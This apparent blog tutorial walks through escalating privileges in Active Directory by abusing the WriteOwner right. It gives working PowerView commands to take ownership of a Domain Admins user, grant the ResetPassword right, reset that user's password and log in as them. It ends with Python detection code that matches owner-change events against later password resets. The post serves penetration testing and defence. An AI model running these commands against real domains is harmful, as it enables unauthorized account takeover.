WriteOwner On User

WriteOwner

WriteOwner is a permission that allows you to change the ownership of an object. If you have WriteOwner on a user object, you can make yourself the owner of that user. Because the owner of an object can always modify its DACL, ownership of a user object lets you grant yourself a right such as ResetPassword, which allows you to reset the user's password and thereby escalate your privileges.

Enumeration

PowerView

WriteOwner Enumeration

Get your current user's SID by executing whoami /user, import PowerView, then execute the command below to list the objects on which you have the WriteOwner right.

Command

get-objectacl -resolveguids | ? {($_.securityidentifier -eq "[your_current_user_sid]") -and ($_.activedirectoryrights -like "*WriteOwner*")}

[Image: the current user usman has the WriteOwner right on the user object ali.]

User Enumeration

Execute the below command to get more information about the target user.

Command

get-netuser [target_user]

[Image: the target user ali is a member of Domain Admins.]

BloodHound

You can also get the same result using BloodHound.

[Image: the current user usman has the WriteOwner right on the user object ali, who is a member of Domain Admins.]

Exploitation

PowerView

Change Ownership Of User

Execute the command below to give yourself ownership of the target user ali.

Command

set-domainobjectowner -Identity [target_user] -OwnerIdentity [Your Current User]

You can verify it using BloodHound.

[Image: the user usman is the owner of the user ali.]

You can verify it from Server Manager.

[Image: the user usman is the owner of the user ali.]

Give ResetPassword Right

Since you are now the owner of the user ali, you can execute the command below to give yourself the ResetPassword right on that user.

Command

add-domainobjectacl -TargetIdentity [target_user] -PrincipalIdentity [Your Current User] -Rights Resetpassword

You can verify it using the below command.

Command

get-objectacl -resolveguids | ? {$_.securityidentifier -eq "[your_current_user_sid]"}

Reset Password

With the ResetPassword right granted, you can reset the user's password and log in to the account by executing the commands below.

Command

$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass 
runas /user:[domain\user] cmd.exe

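Detection

The chain above leaves a recognizable sequence in the domain controller Security log: event 5136 on the target's nTSecurityDescriptor in which the owner changes to the account making the change, followed by a 4724 password reset from that same account. The Python below is an added example, not code from the original post, that correlates the two. It assumes directory-change and account-management auditing are enabled and that events were normalized into dictionaries with the hypothetical keys shown (old and new SDDL paired, one account name per target); the records and SID are constructed.

```python
import re
from datetime import datetime, timedelta

OWNER_RE = re.compile(r"^O:(S-[\d-]+|[A-Z]{2})")      # owner field of an SDDL string
RESET_GUID = "00299570-246d-11d0-a768-00aa006e0529"   # User-Force-Change-Password

def owner(sddl):
    m = OWNER_RE.match(sddl)
    return m.group(1) if m else None

def grants_reset(sddl, sid):
    """True if an object ACE gives `sid` the password-reset extended right."""
    for ace in re.findall(r"\(([^)]*)\)", sddl):
        f = ace.split(";")
        if len(f) >= 6 and f[0] == "OA" and f[3].lower() == RESET_GUID and f[5] == sid:
            return True
    return False

def find_takeover_chains(events, window=timedelta(minutes=30)):
    """Return 4724 resets preceded by the same actor taking ownership of the target."""
    taken, findings = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        when, key = datetime.fromisoformat(ev["time"]), (ev["actor"], ev["target"])
        if ev["id"] == 5136 and ev["attr"] == "nTSecurityDescriptor":
            new_owner = owner(ev["new_sddl"])
            # Owner moved, and the new owner is the account that made the change.
            if new_owner == ev["actor_sid"] and owner(ev["old_sddl"]) != new_owner:
                taken[key] = {"since": when, "acl_grant": False}
            if key in taken and grants_reset(ev["new_sddl"], ev["actor_sid"]):
                taken[key]["acl_grant"] = True
        elif ev["id"] == 4724 and key in taken and when - taken[key]["since"] <= window:
            findings.append({"actor": key[0], "target": key[1], "reset_at": ev["time"],
                             "acl_grant_seen": taken[key]["acl_grant"]})
    return findings

# Constructed sample records (hypothetical normalized schema), not real logs.
U = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed SID for usman
SD = "nTSecurityDescriptor"
EVENTS = [
    {"id": 5136, "time": "2024-01-10T09:00:05", "actor": "usman", "actor_sid": U, "target": "ali",
     "attr": SD, "old_sddl": "O:DAG:DAD:AI(A;;RPWP;;;DA)", "new_sddl": f"O:{U}G:DAD:AI(A;;RPWP;;;DA)"},
    {"id": 5136, "time": "2024-01-10T09:01:10", "actor": "usman", "actor_sid": U, "target": "ali",
     "attr": SD, "old_sddl": f"O:{U}G:DAD:AI(A;;RPWP;;;DA)",
     "new_sddl": f"O:{U}G:DAD:AI(A;;RPWP;;;DA)(OA;;CR;{RESET_GUID};;{U})"},
    {"id": 4724, "time": "2024-01-10T09:02:30", "actor": "usman", "target": "ali"},
    # Benign: routine help-desk reset with no preceding owner change.
    {"id": 4724, "time": "2024-01-10T10:00:00", "actor": "helpdesk", "target": "bob"},
]

if __name__ == "__main__":
    for finding in find_takeover_chains(EVENTS):
        print(finding)
```

The owner comparison against the previous descriptor keeps accounts that already own objects they created from being flagged each time they edit a DACL.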

This post is licensed under CC BY 4.0 by the author.